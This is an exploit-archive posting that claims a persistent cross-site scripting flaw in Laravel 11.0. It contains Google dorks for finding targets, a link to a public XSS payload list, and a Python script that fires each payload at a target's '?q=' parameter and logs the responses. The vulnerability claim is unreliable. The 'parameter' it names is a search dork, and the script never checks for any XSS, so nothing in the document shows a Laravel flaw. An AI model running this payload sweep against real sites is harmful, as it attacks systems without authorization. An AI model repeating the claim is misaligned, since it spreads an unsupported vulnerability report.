exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Laravel 11.0 Cross Site Scripting

Laravel 11.0 Cross Site Scripting
Posted Dec 2, 2024
Authored by E1.Coders

Laravel version 11.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 18c911de78fea14ce7c2b2016a2eed4ceae0df290d5eae7a1ebed85970fb75db

Laravel 11.0 Cross Site Scripting

Change Mirror Download
/*!
- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:.com/?q=
- # GOOGLE DORK: Site:.com/?q=
- # DATE: 2024-12-01
- # SECURITY RESEARCHER:  E1.Coders
- # VENDOR: LARAVEL [https://laravel.com/ ]
- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt
*/
 
 
### -- [ Info: ]
 
[i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website.
 
[i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=
 
 
### -- [ Impact: ]
 
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
 
 
### -- [ EXPLOIT : ]
 
 
 
import requests
 
# Target URL
url = "https://TARGET.com/?q="
 
# Function to read payloads from a file
def read_payloads(filename="payloads.txt"):
    try:
        with open(filename, "r") as f:
            payloads = [line.strip() for line in f]
        return payloads
    except FileNotFoundError:
        print(f"Error: File '{filename}' not found.")
        return []
 
# Function to perform the request
def xss_attack(url, payload):
    full_url = url + payload
    try:
        response = requests.get(full_url)
        return response.status_code, response.text # return status code and response text
    except requests.exceptions.RequestException as e:
        print(f"An error occurred during the request: {e}")
        return None, None
 
# Main function to iterate over payloads and attack
def main():
    payloads = read_payloads()
    if not payloads:
        return
 
    results = []
    for payload in payloads:
        status_code, response_text = xss_attack(url, payload)
        if status_code:
          results.append({"payload": payload, "status_code": status_code, "response": response_text})
 
    #Save results to a file (Example, you might need to adjust based on your desired output)
    with open("attack_results.txt", "w") as f:
        for result in results:
            f.write(f"Payload: {result['payload']}\n")
            f.write(f"Status Code: {result['status_code']}\n")
            f.write(f"Response: {result['response']}\n\n")
 
if __name__ == "__main__":
    main()
 
 
 
### -- [ Contacts: ]
 
[+] E-Mail: E1.Coders@Mail.Ru
 
[+] GitHub: @e1coders
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close